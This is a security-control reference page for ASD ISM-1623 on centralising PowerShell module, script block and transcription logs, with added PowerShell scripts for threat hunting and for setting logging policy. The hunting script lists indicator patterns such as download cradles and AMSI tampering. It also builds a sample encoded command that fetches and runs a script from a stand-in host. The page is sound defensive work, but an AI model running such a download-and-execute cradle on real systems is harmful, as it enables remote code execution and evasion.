Centralised Logging of PowerShell Activities
Ensure PowerShell actions and logs are collected in a central place for monitoring.
Plain language
This control is about making sure all the actions and logs from PowerShell, the scripting shell built into every Windows computer, are collected in one central spot. This matters because attackers use PowerShell precisely because it is already installed and trusted; if you don't keep track of what's happening with it on each machine, you can miss the signs that someone is trying to break into your computers or steal important data, and a local-only log can simply be cleared by the intruder.
Framework
ASD Information Security Manual (ISM)
Control effect
Detective
Classifications
NC, OS, P, S, TS
ISM last updated
Nov 2023
Control Stack last updated
19 Mar 2026
E8 maturity levels
ML2, ML3
Official control statement
PowerShell module logging, script block logging and transcription events are centrally logged.
Why it matters
Without centralised logging of PowerShell module, script block and transcription events, malicious PowerShell use may go unnoticed, leading to compromise or data breach.
Operational notes
Enable module logging, script block logging and transcription through Group Policy, forward the Microsoft-Windows-PowerShell/Operational event log (Event IDs 4103 and 4104) and the transcript text files to a central SIEM, and routinely hunt for suspicious cmdlets, encoded commands and unusual scripts.
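The hunt described above, as an added example that is not part of the original page: it queries script block events (Event ID 4104), decodes any `-EncodedCommand` payload (UTF-16LE base64) so that patterns hidden inside it are also matched, and flags common indicators. The pattern list, function names and the sample script blocks are this example's own assumptions, and the samples are constructed so the logic can be exercised without a live event log.

```powershell
# Added example: hunt over PowerShell script block events (Event ID 4104).
# Not from the original page; the indicator list below is an assumption, not a
# complete detection rule set.

# Indicators a hunter commonly flags (names and regexes chosen for this example)
$SuspiciousPatterns = @{
    'EncodedCommand'   = '-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}'
    'Base64Decode'     = 'FromBase64String'
    'InvokeExpression' = '\b(iex|Invoke-Expression)\b'
    'DownloadCradle'   = '(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)'
    'ReflectionLoad'   = '\[System\.Reflection\.Assembly\]::Load'
    'AmsiTamper'       = 'amsiInitFailed|AmsiUtils'
    'HiddenWindow'     = '-(w|win|windowstyle)\s+hidden'
    'BypassPolicy'     = '-(ep|exec|executionpolicy)\s+bypass'
}

function Get-DecodedCommand {
    param([string]$Text)
    # -EncodedCommand payloads are base64 of UTF-16LE text; return the decoded
    # command, or $null when the text carries none (or it does not decode).
    $m = [regex]::Match($Text, '-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})', 'IgnoreCase')
    if (-not $m.Success) { return $null }
    try { [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value)) }
    catch { $null }
}

function Test-ScriptBlockText {
    param([string]$Text, [string]$Source = 'unknown')
    # Match indicators against the raw text AND the decoded payload, so an
    # encoded download cradle is reported as both EncodedCommand and DownloadCradle.
    $decoded = Get-DecodedCommand -Text $Text
    $corpus  = if ($decoded) { "$Text`n$decoded" } else { $Text }
    $hits = [System.Collections.Generic.List[string]]::new()
    foreach ($name in $SuspiciousPatterns.Keys) {
        if ($corpus -match $SuspiciousPatterns[$name]) { $hits.Add($name) }
    }
    [pscustomobject]@{
        Source  = $Source
        Hits    = @($hits | Sort-Object)
        Decoded = $decoded
        Snippet = $Text.Substring(0, [Math]::Min(80, $Text.Length))
    }
}

function Get-SuspiciousScriptBlockEvents {
    param([int]$MaxEvents = 500)
    # Live query: run on a host, or on a WEF collector against the log the
    # subscription writes to (ForwardedEvents by default).
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
        -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Properties[2] of a 4104 event is the ScriptBlockText field
            $r = Test-ScriptBlockText -Text $_.Properties[2].Value -Source "$($_.MachineName) $($_.TimeCreated)"
            if ($r.Hits.Count -gt 0) { $r }
        }
}

# Constructed sample script blocks (not real telemetry) to exercise the logic offline
$payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
$b64     = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$Samples = @(
    @{ Source = 'ws01 (constructed)';  Text = "powershell.exe -NoP -W Hidden -EncodedCommand $b64" },
    @{ Source = 'ws02 (constructed)';  Text = 'Get-ChildItem C:\Users | Sort-Object LastWriteTime' },
    @{ Source = 'srv03 (constructed)'; Text = '[System.Reflection.Assembly]::Load([Convert]::FromBase64String($blob))' }
)
$Samples |
    ForEach-Object { Test-ScriptBlockText -Text $_.Text -Source $_.Source } |
    Where-Object { $_.Hits.Count -gt 0 } |
    Format-List
```

Only the first and third samples are reported; the first is flagged for EncodedCommand and HiddenWindow on the raw text and for InvokeExpression and DownloadCradle on the decoded payload, which is the reason for decoding before matching. Replace the sample loop with `Get-SuspiciousScriptBlockEvents` on a collector to run the same logic over forwarded events.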
Implementation tips
- The IT team should set up a central log collector (a SIEM, or a Windows Event Forwarding collector feeding one) and configure every Windows host to forward the Microsoft-Windows-PowerShell/Operational event log to it, either by a WEF subscription or an agent. Keep the subscription or agent configuration as evidence.
- System administrators should enable PowerShell module logging on all computers. This records pipeline execution events (Event ID 4103) for the listed modules; set the module name list to `*` so every module is covered. Deploy it through Group Policy (Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell > Turn on Module Logging) rather than by hand on each host, so the setting is enforced and re-applied.
- IT personnel need to activate script block logging (Turn on PowerShell Script Block Logging, same policy path). This records the content of every script block as it is executed (Event ID 4104), including code that was built or decoded at run time, which is what makes it useful against obfuscated scripts.
- The IT security team should implement transcription logging (Turn on PowerShell Transcription), which records the input and output of PowerShell sessions to text files in the configured output directory. Transcripts are files, not event log entries, so event forwarding alone does not centralise them: point the output directory at a restricted share or have an agent collect the directory, and enable invocation headers so each command carries a timestamp.
- PowerShell 7 reads its own policy settings (separate from Windows PowerShell 5.1); where both are installed, apply module, script block and transcription settings for both.
- The IT manager should regularly review the collected PowerShell logs to check for unusual activity. This involves examining the logs for any signs of unauthorised access or unexpected changes and ensuring they are retained for the period required by company policy or regulations.
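The procedure above, as an added example that is not the page's or ASD's own code: it writes the registry values that the Windows PowerShell 5.1 Group Policy settings set, reads them back in the form an auditor would want, and checks that a script block event actually reaches the local Operational log. It assumes an elevated session; the transcript directory, the marker string and the function names are this example's choices. In production these values come from a GPO (which overwrites local values on refresh), and the transcript directory still needs a file collector.

```powershell
# Added example (not from the page): set the three logging policies the control
# names, then produce audit evidence. Run elevated on Windows PowerShell 5.1.
# $TranscriptDir is an assumed path; an agent must collect the files written there.

$PolicyRoot    = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
$TranscriptDir = 'C:\PSTranscripts'
$PsLog         = 'Microsoft-Windows-PowerShell/Operational'

function Set-PowerShellLoggingPolicy {
    # Module logging -> Event ID 4103; '*' under ModuleNames covers every module
    New-Item -Path "$PolicyRoot\ModuleLogging\ModuleNames" -Force | Out-Null
    New-ItemProperty -Path "$PolicyRoot\ModuleLogging" -Name EnableModuleLogging -Value 1 -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path "$PolicyRoot\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null

    # Script block logging -> Event ID 4104 carrying the script text as executed
    New-Item -Path "$PolicyRoot\ScriptBlockLogging" -Force | Out-Null
    New-ItemProperty -Path "$PolicyRoot\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -PropertyType DWord -Force | Out-Null

    # Transcription -> text files in OutputDirectory, not event log entries
    New-Item -Path "$PolicyRoot\Transcription" -Force | Out-Null
    New-ItemProperty -Path "$PolicyRoot\Transcription" -Name EnableTranscripting -Value 1 -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path "$PolicyRoot\Transcription" -Name EnableInvocationHeader -Value 1 -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path "$PolicyRoot\Transcription" -Name OutputDirectory -Value $TranscriptDir -PropertyType String -Force | Out-Null
    New-Item -ItemType Directory -Path $TranscriptDir -Force | Out-Null
    # Transcripts contain command output: restrict the directory ACL so users can
    # write but not read or delete each other's files (ACL left to the deployment).
}

function Get-PowerShellLoggingPolicy {
    # One object with a true/false per setting the control names (audit evidence)
    $read = {
        param($Sub, $Name)
        $key = Get-Item -Path "$PolicyRoot\$Sub" -ErrorAction SilentlyContinue
        if ($key) { $key.GetValue($Name) }
    }
    [pscustomobject]@{
        ModuleLogging      = (& $read 'ModuleLogging' 'EnableModuleLogging') -eq 1
        AllModulesLogged   = (& $read 'ModuleLogging\ModuleNames' '*') -eq '*'
        ScriptBlockLogging = (& $read 'ScriptBlockLogging' 'EnableScriptBlockLogging') -eq 1
        Transcription      = (& $read 'Transcription' 'EnableTranscripting') -eq 1
        TranscriptDir      = & $read 'Transcription' 'OutputDirectory'
    }
}

function Test-ScriptBlockEventFlow {
    # Execute a marker script block and confirm a 4104 event carrying it was written.
    # Run in a fresh session after the policy is applied; the policy is read at startup.
    $marker = "ISM-1623-check-$(Get-Random)"
    & ([scriptblock]::Create("'$marker'")) | Out-Null
    Start-Sleep -Seconds 2
    $hit = Get-WinEvent -FilterHashtable @{ LogName = $PsLog; Id = 4104; StartTime = (Get-Date).AddMinutes(-5) } `
        -ErrorAction SilentlyContinue |
        Where-Object { $_.Properties[2].Value -like "*$marker*" } |
        Select-Object -First 1
    [bool]$hit
}

Set-PowerShellLoggingPolicy
Get-PowerShellLoggingPolicy | Format-List
"Script block event observed locally: $(Test-ScriptBlockEventFlow)"
```

`Get-PowerShellLoggingPolicy` is the screenshot-free evidence for the audit questions on this page: run it across hosts (for example through `Invoke-Command`) and keep the output. The same `Get-WinEvent` query run on the collector against the log the WEF subscription writes to (ForwardedEvents by default) is the check that events are arriving centrally, not just locally.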
Audit / evidence tips
- Ask for the central logging server configuration details: request documents or screenshots showing how computers are set up to send logs to the server. Good result: an active system where logs are received and stored correctly.
- Ask for evidence that PowerShell module logging is enabled: request the Group Policy or per-host settings that turn it on. Good result: the settings are enabled and functional across all computers.
- Ask for documentation or screenshots showing script block logging is turned on in PowerShell; ensure the setting is enabled and the logs are going to the central collection. Good result: the feature is active and reporting correctly.
- Ask for evidence of transcription logging settings: request details or screenshots proving transcription logging is configured for PowerShell sessions, and check that these settings send the logs centrally and are not disabled. Good result: transcripts are being recorded and sent properly.
- Ask for evidence that the collected PowerShell logs are reviewed: request review records or SIEM reports. Good result: logs are reviewed regularly and any issues are followed up.
Cross-framework mappings
How ISM-1623 relates to controls across ISO/IEC 27001, Essential Eight, and ASD ISM.
ISO 27001
| Relationship | Control | Notes |
|---|---|---|
| Partially meets | Annex A 8.15 | ISM-1623 requires centralised logging specifically for PowerShell module, script block and transcription events |
| Supports | Annex A 5.28 | ISM-1623 requires centralised collection of detailed PowerShell activity logs (module, script block and transcription) |
E8
| Relationship | Control | Notes |
|---|---|---|
| Partially overlaps | E8-RA-ML2.7 | E8-RA-ML2.7 requires privileged account and group management events to be centrally logged for visibility of administrative changes |
| Partially overlaps | E8-AH-ML2.12 | E8-AH-ML2.12 requires that command line process creation events are centrally logged |
| Related | E8-AH-ML2.11 | ISM-1623 requires that PowerShell module logging, script block logging and transcription events are centrally logged for monitoring |
These mappings show relationships between controls across frameworks. They do not imply full equivalence or certification.